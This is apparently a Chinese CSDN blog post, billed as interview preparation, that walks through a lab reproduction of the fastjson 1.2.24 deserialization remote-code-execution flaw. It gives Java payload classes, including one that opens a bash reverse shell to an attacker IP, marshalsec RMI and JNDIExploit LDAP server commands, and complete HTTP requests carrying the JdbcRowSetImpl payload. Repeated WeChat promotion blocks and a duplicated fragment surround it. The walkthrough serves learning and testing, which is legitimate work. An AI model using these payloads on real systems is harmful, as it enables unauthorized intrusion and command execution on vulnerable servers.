fastjson反序列化漏洞,BAT大厂最爱问的网络安全核心面试百题详细解析

于 2024-04-15 05:58:23 发布
阅读量635 收藏 20
点赞数 22
分类专栏: 2024年程序员学习 文章标签: web安全 面试 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sheji1213/article/details/137762639
版权

先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7

深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年最新网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较多,这里只是将部分目录截图出来,全套包含大厂面经、学习笔记、源码讲义、实战项目、大纲路线、讲解视频,并且后续会持续更新

如果你需要这些资料,可以添加V获取:vip204888 (备注网络安全)
img

正文

img

返回payload,利用post方式将其发送至靶机服务端,同时Content-Type类型为application/json。

img

查看nc,已经接收到反弹的shell了

img

4.2 fastjson <=1.2.24 反序列化导致任意命令执行漏洞
4.2.1 环境准备

攻击机:win10 burp

vps:java python nc

靶机:kali

(条件有限vps上要搭建的东西移到了同为靶机的kali上)

4.2.2 复现过程

由于该版本没有专用的jar包需要自己进行编译。

首先编译远程调用的java文件(建议使用jdk1.8编译,其他版本编译出来的可能会不执行)

payload如下:
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
static {
	try {
			Runtime rt = Runtime.getRuntime();
			String[] commands = {"touch", "/tmp/success"};
			Process pc = rt.exec(commands);
			pc.waitFor();
		} catch (Exception e)
			{
				// do nothing
			}
		}
	}	
反弹shellpayload
// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
public class TouchFile {
   static {
       try {
   		Runtime r = Runtime.getRuntime();
   		Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.155.128/4444 0>&1"});
   		p.waitFor();
       } catch (Exception e) {
           // do nothing
       }
   }
}

利用javac编译为class文件

javac TouchFile.java

img

当前文件夹则会生成一个class文件

img

安装maven环境

apt-get install maven

然后在编译好的java文件夹下启动一个http服务

python -m SimpleHTTPServer 3333

现在我们利用marshalsec项目,启动一个RMI服务器,监听9999端口,并使其加载编译好的类文件TouchFile.class

下载该项目,然后进行项目编译

mvn clean package -DskipTests

编译成功后会多出一个target文件夹,其中便有我们需要的jar包

img

img

此时执行监听命令

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://刚class文件的ip或域名/#TouchFile" 9999

img

抓取数据包发送payload

POST / HTTP/1.1
Host: 192.168.155.128:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: lang=zh-CN
Connection: close
Content-Length: 123
Content-Type:application/json

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.155.128:9999/TouchFile",
        "autoCommit":true
    }
}

成功获得shell

img

img

4.3 fastjson即时回显利用
前情提要

​ 在大部分情况下,可能没有做到如上面两种试验里这么顺利,遇到最多的问题就是class文件不读取或者读取了不执行,可以直接利用工具,进行一个帮助的回显

​ 工具链接:

https://github.com/WhiteHSBG/JNDIExploit

​ 利用该工具首先需要阅读一下说明(在工具文件内或者github上看),该工具主要启动ldap服务,支持多种路由格式,可以根据不同的路由选择不同的payloadtype和GadgetType。

启动工具

java -jar JNDIExploit-1.4-SNAPSHOT.jar  -i vps-ip

img

漏洞复现

​ 具体格式不变,同样是普通的fastjson格式的payload,但是里面引用的连接需要进行修改,同时,需要在hrader头中加入cmd: ifconfig等等命令

POST /api/auth/ainfo/contact/listFamily HTTP/1.1
Host: xxxxxx
Content-Length: 168
sn: null
cmd: ifconfig
Content-Type: application/json
Accept: application/json, text/plain, */*
timestamp: 1663245585261
device: null
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
utype: 1
token: null
sign: 892ed5ef47f06f89fb6e9a6812718b68
Origin: http://xxxx:8095
Referer: http://xxxx:8095/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

{"handsome":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://xxxxx:1389/Deserialization/CommonsCollectionsK1/TomcatEcho","autoCommit":true}}

​ 将payload摘出来看

ldap://xxxx:1389/Deserialization/CommonsCollectionsK1/TomcatEcho
ldap://xxxx:1389:不用说
Deserialization:说明中的Deserialization路由
CommonsCollectionsK1:GadgetType类型,可以挨个尝试直到回显
TomcatEcho:PayloadType类型用于在中间件为 Tomcat 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令

​ 此时直接发送请求,可以看到直接利用tomcat进行了回显

ldap://xxxx:1389/Deserialization/CommonsCollectionsK1/TomcatEcho
ldap://xxxx:1389:不用说


## 学习路线:

这个方向初期比较容易入门一些,掌握一些基本技术,拿起各种现成的工具就可以开黑了。不过,要想从脚本小子变成黑客大神,这个方向越往后,需要学习和掌握的东西就会越来越多以下是网络渗透需要学习的内容:  
 ![在这里插入图片描述](https://img-blog.csdnimg.cn/7a04c5d629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
![img](https://img-blog.csdnimg.cn/img_convert/03cdff41745d50e68aa5c57cc47d1735.png)

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**

629f1415a9e35662316578e07.png#pic_center)





**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**

**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注网络安全)**
[外链图片转存中...(img-xY2YSphO-1713131886322)]

**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
程序员老屋
关注
  • 22
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP反序列化漏洞 附题目
include_heqile的博客
09-03 666
题目一共三个文件: https://pan.baidu.com/s/1OfYZEZ7qWcv2I9OwlcU6_A 反序列化漏洞详细说明可在这篇博客上了解到,讲解还是比较详细的: https://blog.csdn.net/qq_19876131/article/details/52890854 本题目主要就是利用HITCON和SoFun两个类中的__wakeup函数,我们可以控制HIT...
Java安全篇-Fastjson漏洞
最新发布
m0_63138919的博客
03-28 2780
本文章参考网上师傅们的解题和代码审计思路,记录自己的学习过程,还希望各位博主 师傅 大佬 勿喷,还希望大家指出错误
fastjson 漏洞复现
温和的跳跃
07-09 303
可能从fastjson“盘古开天地”开始讲,因为我对序列化 反序列化还有那些组件非常不熟悉(谁不搞开发会对这些熟悉)也算复习一下java知识吧,之前好像我自己大二学习java序列化那章就搜索过序列化漏洞,没办法 我读书时候只对这种东西感兴趣,对一般知识没有兴趣。 我先自己学习一会去。 漏洞复现主要是vulhub/fastjson/1.2.24-rce ...
Shiro的Java原生反序列化漏洞
公众号shadow sock7
07-28 1万+
参考: http://www.lmxspace.com/2019/10/17/Shiro-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E8%AE%B0%E5%BD%95/ https://github.com/jas502n/Shiro_Xray 环境搭建 git clone https://github.com/apache/shiro.git # wget https://codeload.github.com/apache/shiro/zip/shiro-root-1
使用FastJson处理JSON数据
东黧的博客
03-29 5396
一、简介 FastJson对于json格式字符串的解析主要用到了下面三个类: 1.JSON:fastJson解析器,用于JSON格式字符串与JSON对象及javaBean之间的转换 2.JSONObject:fastJson提供的json对象 3.JSONArray:fastJson提供json数组对象 &lt;dependency&gt; &lt;groupId&gt;co...
Fastjson反序列化漏洞史1
08-03
然而,Fastjson在过去的几年里曾曝出一系列的反序列化漏洞,这些漏洞可能被攻击者利用,执行任意代码,从而对系统安全构成威胁。 在2020年5月8日的分析中,文章提到了Fastjson反序列化漏洞的历史,并对一些关键的...
Fastjson各版本反序列化EXP 1.2.24 1.2.41 1.2.42 1.2.43 1.2.45 48 62 66
03-29
# Fastjson反序列化漏洞为例 1、此时/tmp目录 ![img]...
Java反序列化漏洞自动挖掘方法.pdf
08-21
Java反序列化漏洞是软件安全领域中的一个重要话题,尤其在AI信息安全研究和可信编译安全架构中,它关乎系统的安全性和稳定性。反序列化是将从磁盘或网络中读取的序列化数据转换回内存中的对象的过程。在Java中,这一...
高版本的fastjson-1.2.71解决安全漏洞.rar
04-14
Fastjson是阿里巴巴开源的一款高性能的Java JSON库,它在处理JSON数据时提供了快速且便捷的解析和序列化功能。然而,随着广泛使用,Fastjson在早期版本中出现了一些安全漏洞,这些漏洞可能导致远程代码执行(RCE)和...
Java-Deserialization-Cheat-Sheet:关于Java反序列化漏洞的备忘单
05-02
面向渗透测试人员和研究人员的备忘单,其中涉及各种Java(JVM)序列化库中的反序列化漏洞。 请使用#javadeser哈希标签进行鸣叫。 表中的内容 json-io(JSON) 杰克逊(JSON) Fastjson(JSON) Genson(JSON) ...
PHP反序列化之练习题
shy的博客
11-29 1518
pikachu平台反序列化漏洞 第一题:反序列化漏洞输出XSS 地址:https://www.bihuoedu.com/vul/unserilization/unser.php 查看unser.php文件的源码: <?php class S{ var $test = "pikachu"; function __construct(){ echo $this->test; } } //O:1:"S":1:{s:4:"test";s:29:"&.
反序列化漏洞汇总
热门推荐
weixin_29324013的博客
07-03 4万+
反序列化漏洞汇总1、概述序列化是让Java对象脱离Java运行环境的一种手段,可以有效的实现多平台之间的通信、对象持久化存储。 Java 序列化是指把 Java 对象转换为字节序列的过程,便于保存在内存、文件、数据库中,ObjectOutputStream类的 writeObject() 方法可以实现序列化。反序列化是指把字节序列恢复为 Java 对象的过程,ObjectInputStream 类...
信息安全工程师 面试
UP's blog
01-23 2813
web安全面试题及答案
Java之序列化和反序列化,tomcat常见面试
m0_64384202的博客
12-18 596
6、Dubbo Serialization(阿里dubbo序列化) 7、FST(高性能、序列化速度大概是JDK的4-10倍,大小是JDK大小的1/3左右) 8、自定义协议进行序列化 序列化操作和反序列化操作 首先定义一个Person类,然后提供get和set方法,且要实现Serializable接口 class Person implements Serializable { private int id; private String name; public int getId() { return i
干货|2020渗透测试面试问题大全 建议收藏
RuoLi_s的博客
01-28 2万+
转自HACK之道 乌雲安全 渗透篇 0.渗透测试知识体系结构 1、介绍一下自认为有趣的挖洞经历 挖洞也有分很多种类型,一种是以渗透、一种是以找漏洞为主,如果是前者会想各种办法获取权限继而获取想要的的东西完成渗透目标,这类跟HW类似,目标各种漏洞不算,要有Shell,服务器权限才给分,这才是最接近实战渗透,跟某部门有合作的话也是属于这种打击网络犯罪获得权限、传销数据、组织架构,服务器权限、等… 2、你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? SQL注入、密码组合,前者防护分为
ctf题php反序列化,[世安杯]一道关于php反序列化漏洞的题目
weixin_36440198的博客
04-01 983
Paste_Image.png没什么信息,因此ctrl+u查看源码:Paste_Image.png看到提示,file_get_contents()函数,联想到文件包含漏洞,因此google一波,查到Paste_Image.png查看原文因此试一试:Paste_Image.png补充一种饶过方法:由于本题:allow_url_include=On因此可以包含一个远程文件,假设你的云服务IP地址为:x...
JSON介绍与解析
weixin_48891324的博客
08-01 472
简介: JSON是JavaScript Object Notion的简称,是JS对象简谱,是一种轻量级的数据交换格式。 格式: 一个对象,由一个大括号表示,括号中,描述对象的属性,通过键值对来描述对象的属性(可以理解为大括号中包含一个个的键值对) 常规格式:(1)键与值之间使用冒号链接,多个键值对用逗号隔开,最后一个键值对不用逗号 (2)键值对的键通常用引号引起来(通常用在java解析中),且键值可以是JS中的任何值 例: { ...
JAVA 最全最细的fastjson使用介绍,带你透彻领悟JSON,java高级程序员面试
m0_63174811的博客
12-10 428
2.1.2.json字符串(数组类型)与JSONArray之间的转换 /** json字符串-数组类型到JSONArray的转换 */ @Test public void testJSONStrToJSONArray() { JSONArray jsonArray = JSONArray.parseArray(JSON_ARRAY_STR); //遍历方式1 int size = jsonArray.size(); for (int i = 0; i < size; i++) { JSONObje
从一道CTF题学习PHP反序列化漏洞
Fly_鹏程万里
09-17 6301
一、CTF题目 前阵子,参加了一个CTF比赛,其中有一条道题蛮有意思的,所以写出来分享一下。 此题利用了PHP的反序列化漏洞,通过构造特殊的Payload绕过__wakeup()魔术方法,从而实现注入目的,废话不多说,主要源码如下: class SoFun{ protected $file='index.php'; function __destruct(){ ...
fastjson反序列化漏洞_Fastjson反序列化漏洞的检测和利用
05-21
Fastjson是一款Java语言编写的高性能JSON处理器,被广泛应用于各种Java应用程序中。...5. 安全加固:对系统进行安全加固,如限制系统权限、加强访问控制等,避免黑客利用Fastjson反序列化漏洞获取系统权限。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值